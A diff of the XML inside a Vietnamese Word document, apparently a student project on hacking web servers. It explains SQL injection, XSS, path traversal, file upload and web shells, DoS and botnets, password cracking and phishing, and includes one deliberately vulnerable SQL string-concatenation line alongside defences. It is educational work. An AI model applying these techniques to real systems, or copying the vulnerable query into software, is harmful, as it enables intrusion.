+        <w:ind w:left="2520"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Lỗi cấu hình (Misconfiguration):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Đây không phải là lỗi trong mã nguồn hay hệ điều hành, mà là sai sót trong quá trình thiết lập và quản trị. Kẻ tấn công khai thác những điểm yếu này để chiếm quyền kiểm soát.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6955,13 +7180,72 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t>Directory Listing (Liệt kê thư mục):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Khi web server được cấu hình cho phép hiển thị nội dung của một thư mục, kẻ tấn công có thể dễ dàng xem danh sách tệp, bao gồm cả những tệp nhạy cảm như tệp sao lưu hay tệp cấu hình chứa thông tin đăng nhập.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Default Credentials (Thông tin đăng nhập mặc định):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Nhiều dịch vụ web vẫn giữ lại tên người dùng và mật khẩu mặc định sau khi cài đặt. Kẻ tấn công có thể sử dụng những thông tin này để truy cập trái phép.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Unnecessary Services (Các dịch vụ không cần thiết):</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> Việc bật các dịch vụ không cần thiết như FTP, WebDAV, hay các cổng quản trị từ xa có thể tạo ra các "cửa sau" để kẻ tấn công xâm nhập.</w:t>
+        <w:t xml:space="preserve"> Việc bật các dịch vụ không cần thiết như FTP, WebDAV, hay các </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>cổng quản trị từ xa có thể tạo ra các "cửa sau" để kẻ tấn công xâm nhập.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7059,14 +7343,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> Một lỗi lập trình xảy ra khi một chương trình cố gắng ghi dữ liệu vượt quá giới hạn của bộ nhớ đệm (buffer). </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Kẻ tấn công có thể lợi dụng lỗi này để chèn và thực thi mã độc trên máy chủ. Mặc dù lỗi này phổ biến hơn ở các ứng dụng cấp thấp, nó vẫn có thể xảy ra trong các ứng dụng web và web server.</w:t>
+        <w:t xml:space="preserve"> Một lỗi lập trình xảy ra khi một chương trình cố gắng ghi dữ liệu vượt quá giới hạn của bộ nhớ đệm (buffer). Kẻ tấn công có thể lợi dụng lỗi này để chèn và thực thi mã độc trên máy chủ. Mặc dù lỗi này phổ biến hơn ở các ứng dụng cấp thấp, nó vẫn có thể xảy ra trong các ứng dụng web và web server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7387,6 +7664,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Gray Hat (Mũ xám)</w:t>
       </w:r>
       <w:r>
@@ -7490,7 +7768,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Tính bí mật:</w:t>
       </w:r>
       <w:r>
@@ -7584,7 +7861,19 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>Trong trường hợp dữ liệu truyền sau khi bị chặn bắt sẽ được thay đổi và gởi về</w:t>
+        <w:t xml:space="preserve">Trong trường hợp dữ liệu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">được </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>truyền sau khi bị chặn bắt sẽ được thay đổi và gởi về</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7680,19 +7969,19 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>toán mã hóa sẽ cho ra ciphertext, các khái niệm này sẽ được trình bày trong Module 18</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Cryptography). Với dạng tấn công này hacker có thể thay đổi nội dung thông điệp từ</w:t>
+        <w:t>toán mã hóa sẽ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cho ra ciphertext</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>. Với dạng tấn công này hacker có thể thay đổi nội dung thông điệp từ</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7803,7 +8092,14 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>dịch vụ bằng cách gởi một số lượng rất lớn những yêu cầu kết nối, làm cho hệ thống</w:t>
+        <w:t xml:space="preserve">dịch vụ bằng cách gởi một số lượng rất lớn những </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>yêu cầu kết nối, làm cho hệ thống</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7979,14 +8275,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">của các router hay </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>hệ thống kiểm soát truy cập trên mạng không dây dựa trên địa chỉ vật</w:t>
+        <w:t>của các router hay hệ thống kiểm soát truy cập trên mạng không dây dựa trên địa chỉ vật</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8172,7 +8461,14 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>Tấn công SQL Injection có thể gây ra những hậu quả nghiêm trọng, từ việc đánh cắp thông tin nhạy cảm của người dùng (như tài khoản, mật khẩu, thông tin thẻ tín dụng) cho đến việc xóa, thay đổi hoặc chèn dữ liệu. Điều này đã được chứng minh qua các vụ tấn công lớn trong lịch sử. Ví dụ, một đợt tấn công vào tháng 12 năm 2010 đã lấy đi hàng trăm ngàn thông tin khách hàng. Nổi tiếng nhất là vụ việc hacker Albert Gonzalez đã đánh cắp 130 triệu thông tin thẻ tín dụng thông qua lỗ hổng này. Tầm quan trọng của SQL Injection đã được khẳng định khi nó đứng đầu danh sách các lỗ hổng bị tấn công nhiều nhất vào năm 2010, cho thấy tính phổ biến và hiệu quả của kỹ thuật này.</w:t>
+        <w:t xml:space="preserve">Tấn công SQL Injection có thể gây ra những hậu quả nghiêm trọng, từ việc đánh cắp thông tin nhạy cảm của người dùng (như tài khoản, mật khẩu, thông tin thẻ tín dụng) cho đến việc xóa, thay đổi hoặc chèn dữ liệu. Điều này đã được chứng minh qua các vụ tấn công lớn trong lịch sử. Ví dụ, một đợt tấn công vào tháng 12 năm 2010 đã lấy đi hàng trăm ngàn thông tin khách hàng. Nổi tiếng nhất là vụ việc hacker Albert Gonzalez đã đánh cắp 130 triệu thông tin thẻ tín dụng thông qua lỗ hổng này. Tầm quan trọng của SQL Injection đã được khẳng định </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>khi nó đứng đầu danh sách các lỗ hổng bị tấn công nhiều nhất vào năm 2010, cho thấy tính phổ biến và hiệu quả của kỹ thuật này.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8302,7 +8598,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>statement = "SELECT * FROM users WHERE name = '" + userName + "';"</w:t>
       </w:r>
     </w:p>
@@ -8644,6 +8939,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>b) Xử lý không đúng kiểu dữ liệu</w:t>
       </w:r>
       <w:r>
@@ -8846,7 +9142,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>c) Blind SQL Injection (Tấ</w:t>
       </w:r>
       <w:r>
@@ -9109,6 +9404,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Một biến thể khác là dùng lệnh </w:t>
       </w:r>
       <w:r>
@@ -9395,14 +9691,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Đây là dạng tấn công nguy hiểm nhất, đặc biệt nếu ứng dụng web được thực thi với quyền quản trị hệ thống (sa). Kẻ tấn công có thể sử dụng các thủ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>tục lưu trữ (stored procedures) có sẵn trong cơ sở dữ liệu để thực thi các lệnh trên hệ điều hành của máy chủ.</w:t>
+        <w:t>Đây là dạng tấn công nguy hiểm nhất, đặc biệt nếu ứng dụng web được thực thi với quyền quản trị hệ thống (sa). Kẻ tấn công có thể sử dụng các thủ tục lưu trữ (stored procedures) có sẵn trong cơ sở dữ liệu để thực thi các lệnh trên hệ điều hành của máy chủ.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9599,6 +9888,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Có nhiều công cụ hỗ trợ tấn công SQL Injection, giúp tự động hóa quy trình tìm kiếm và khai thác lỗ hổ</w:t>
       </w:r>
       <w:r>
@@ -9809,7 +10099,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Áp dụng Prepared Statements (Câu lệnh chuẩn bị):</w:t>
       </w:r>
       <w:r>
@@ -10035,6 +10324,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Cross-Site Scripting (XSS)</w:t>
       </w:r>
       <w:r>
@@ -10142,7 +10432,6 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Có ba dạng tấn công XSS chính:</w:t>
       </w:r>
     </w:p>
@@ -10280,6 +10569,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Đánh cắp Cookie:</w:t>
       </w:r>
       <w:r>
@@ -10458,7 +10748,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Mã hóa đầu ra (Output Encoding):</w:t>
       </w:r>
       <w:r>
@@ -10616,6 +10905,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Directory Traversal, hay còn gọi là Path Traversal, là một lỗ hổng bảo mật nghiêm trọng cho phép kẻ tấn công truy cập vào các tệp tin và thư mục nằm ngoài thư mục gốc của ứng dụng web. Lỗ hổng này xảy ra khi ứng dụng web không kiểm tra hoặc lọc đầy đủ dữ liệu đầu vào của người dùng, cho phép kẻ tấn công sử dụng các chuỗi ký tự đặc biệt như ../ (để di chuyển lên một cấp thư mục) để truy vấn hệ thống tập tin của máy chủ</w:t>
       </w:r>
       <w:r>
@@ -10822,7 +11112,6 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Cụ thể, chuỗi ký tự </w:t>
       </w:r>
       <w:r>
@@ -11089,6 +11378,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Nếu cuộc tấn công này thành công, trình duyệt web của kẻ tấn công sẽ hiển thị toàn bộ nội dung của ổ đĩa C:, cho phép họ thu thập thông tin nhạy cảm.</w:t>
       </w:r>
     </w:p>
@@ -11268,7 +11558,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Cài đặt bản vá lỗi và cập nhật đầy đủ:</w:t>
       </w:r>
       <w:r>
@@ -11449,6 +11738,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Lỗ hổng File Upload là một trong những điểm yếu nguy hiểm nhất của ứng dụng web, cho phép kẻ tấn công tải lên các tệp tin độc hại lên máy chủ. Mối nguy này xuất phát từ việc cấu hình lỏng lẻo của máy chủ web hoặc ứng dụng web</w:t>
       </w:r>
       <w:r>
@@ -11656,14 +11946,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">oại mã độc được sử dụng phổ biến nhất để chiếm quyền điều </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">khiển là </w:t>
+        <w:t xml:space="preserve">oại mã độc được sử dụng phổ biến nhất để chiếm quyền điều khiển là </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11876,6 +12159,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Đọc và ghi tệp tin:</w:t>
       </w:r>
       <w:r>
@@ -12128,7 +12412,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Tách riêng thư mục tải lên:</w:t>
       </w:r>
       <w:r>
@@ -12272,6 +12555,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Khái niệm về Tấn công Từ chối Dịch vụ (DoS)</w:t>
       </w:r>
     </w:p>
@@ -12443,7 +12727,6 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Trong môi trường tấn công DoS, có nhiều kỹ thuật khác nhau được các hacker sử dụng để làm quá tải hệ thống mục tiêu. Dưới đây là một số dạng tấn công điển hình:</w:t>
       </w:r>
     </w:p>
@@ -12551,6 +12834,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>CPU Hog:</w:t>
       </w:r>
       <w:r>
@@ -12774,14 +13058,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">) là một hình thức tấn công DoS nhưng ở quy mô lớn hơn, được thực hiện từ nhiều máy tính khác nhau. Để thực hiện DDoS, hacker sử dụng một hệ thống mạng máy tính "ma" gọi là botnet. Mỗi máy tính trong mạng này </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>được gọi là một bot hay zombie, đã bị lây nhiễm trojan và có thể được điều khiển từ xa.</w:t>
+        <w:t>) là một hình thức tấn công DoS nhưng ở quy mô lớn hơn, được thực hiện từ nhiều máy tính khác nhau. Để thực hiện DDoS, hacker sử dụng một hệ thống mạng máy tính "ma" gọi là botnet. Mỗi máy tính trong mạng này được gọi là một bot hay zombie, đã bị lây nhiễm trojan và có thể được điều khiển từ xa.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12898,7 +13175,14 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>Hacker thường phát động các cuộc tấn công DDoS bằng cách ra lệnh cho tất cả các bot trong mạng botnet đồng loạt gửi các yêu cầu đến mục tiêu. Với số lượng khổng lồ các yêu cầu từ hàng nghìn, thậm chí hàng triệu bot, máy chủ nạn nhân sẽ bị quá tải ngay lập tức, dẫn đến sập hệ thống và từ chối tất cả các dịch vụ.</w:t>
+        <w:t xml:space="preserve">Hacker thường phát động các cuộc tấn công DDoS bằng cách ra lệnh cho tất cả các bot trong mạng botnet đồng loạt gửi các yêu cầu đến mục tiêu. Với số lượng khổng lồ các yêu cầu từ hàng nghìn, thậm chí </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>hàng triệu bot, máy chủ nạn nhân sẽ bị quá tải ngay lập tức, dẫn đến sập hệ thống và từ chối tất cả các dịch vụ.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13109,7 +13393,6 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Để phòng chống các cuộc tấn công từ chối dịch vụ, cần áp dụng một chiến lược bảo mật toàn diện và đa lớp. Dưới đây là các biện pháp quan trọng:</w:t>
       </w:r>
     </w:p>
@@ -13199,6 +13482,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Intrusion Detection System (IDS):</w:t>
       </w:r>
       <w:r>
@@ -13496,14 +13780,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Trong lĩnh vực an toàn hệ thống, việc bẻ khóa mật khẩu (Password Cracking) là một trong những mục tiêu đầu tiên và quan trọng nhất của tin tặc. Lý do là vì mật khẩu là thông tin then chốt để truy cập vào hệ thống. Tỉ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>lệ thành công của các cuộc tấn công mật khẩu thường cao vì người dùng có xu hướng đặt những mật khẩu dễ nhớ, liên quan đến thông tin cá nhân như ngày sinh, tên người thân, hoặc thậm chí là sử dụng chung một mật khẩu cho nhiều dịch vụ khác nhau. Khi một mật khẩu bị lộ, các hệ thống khác cũng có thể bị ảnh hưởng.</w:t>
+        <w:t>Trong lĩnh vực an toàn hệ thống, việc bẻ khóa mật khẩu (Password Cracking) là một trong những mục tiêu đầu tiên và quan trọng nhất của tin tặc. Lý do là vì mật khẩu là thông tin then chốt để truy cập vào hệ thống. Tỉ lệ thành công của các cuộc tấn công mật khẩu thường cao vì người dùng có xu hướng đặt những mật khẩu dễ nhớ, liên quan đến thông tin cá nhân như ngày sinh, tên người thân, hoặc thậm chí là sử dụng chung một mật khẩu cho nhiều dịch vụ khác nhau. Khi một mật khẩu bị lộ, các hệ thống khác cũng có thể bị ảnh hưởng.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13542,6 +13819,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Các dạng tấn công mật khẩu</w:t>
       </w:r>
     </w:p>
@@ -13712,14 +13990,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> Là cuộc tấn công sử dụng thuật toán vét cạn, thử mọi tổ hợp có thể có của các chữ cái (hoa và thường), số và ký hiệu. Đây là phương pháp chậm nhất nhưng hiệu quả </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>nhất, vì nó sẽ thành công nếu có đủ thời gian và sức mạnh xử lý.</w:t>
+        <w:t xml:space="preserve"> Là cuộc tấn công sử dụng thuật toán vét cạn, thử mọi tổ hợp có thể có của các chữ cái (hoa và thường), số và ký hiệu. Đây là phương pháp chậm nhất nhưng hiệu quả nhất, vì nó sẽ thành công nếu có đủ thời gian và sức mạnh xử lý.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13817,6 +14088,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Cách thức lừa đảo: Kẻ gian sẽ tạo ra một trang web có tên miền gần giống Facebook (ví dụ: facebook-login-reward.com, meta-security-login.net). Họ thường gửi đường link này qua tin nhắn Messenger, email hoặc quảng cáo trên các hội nhóm với nội dung hấp dẫn như:</w:t>
       </w:r>
       <w:r>
@@ -13994,7 +14266,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>John The Ripper:</w:t>
       </w:r>
       <w:r>
@@ -14070,6 +14341,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Samdump và Pwdump2:</w:t>
       </w:r>
       <w:r>
@@ -14521,7 +14793,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Input Sanitation</w:t>
       </w:r>
       <w:bookmarkEnd w:id="25"/>
@@ -14647,6 +14918,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>REFERENCES</w:t>
       </w:r>
       <w:bookmarkEnd w:id="30"/>
@@ -14654,6 +14926,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Bibliography"/>
+        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14696,6 +14969,9 @@
         <w:pStyle w:val="Bibliography"/>
       </w:pPr>
       <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
         <w:t>[2]</w:t>
       </w:r>
       <w:r>
@@ -14706,7 +14982,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Bibliography"/>
-      </w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:t>[3]</w:t>
       </w:r>
@@ -14742,12 +15022,10 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:type w:val="continuous"/>
       <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
       <w:cols w:space="720"/>
-      <w:titlePg/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
@@ -14777,6 +15055,41 @@
     </w:p>
   </w:endnote>
 </w:endnotes>
+</file>
+
+<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Footer"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+  </w:p>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Footer"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Footer"/>
+      <w:jc w:val="center"/>
+      <w:rPr>
+        <w:noProof/>
+      </w:rPr>
+    </w:pPr>
+  </w:p>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Footer"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
@@ -18034,6 +18347,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -18939,7 +19253,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2D2D164D-A1B3-434A-B8C1-144242E2001E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E691D00F-4894-47C8-AC9C-F053B5628CDC}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Hacking_Web_Server_Project.docx
+++ b/Hacking_Web_Server_Project.docx
@@ -595,9 +595,13 @@
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
           <w:noProof/>
-          <w:sz w:val="24"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -621,7 +625,7 @@
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc207351921" w:history="1">
+      <w:hyperlink w:anchor="_Toc208343436" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -634,9 +638,13 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:sz w:val="24"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
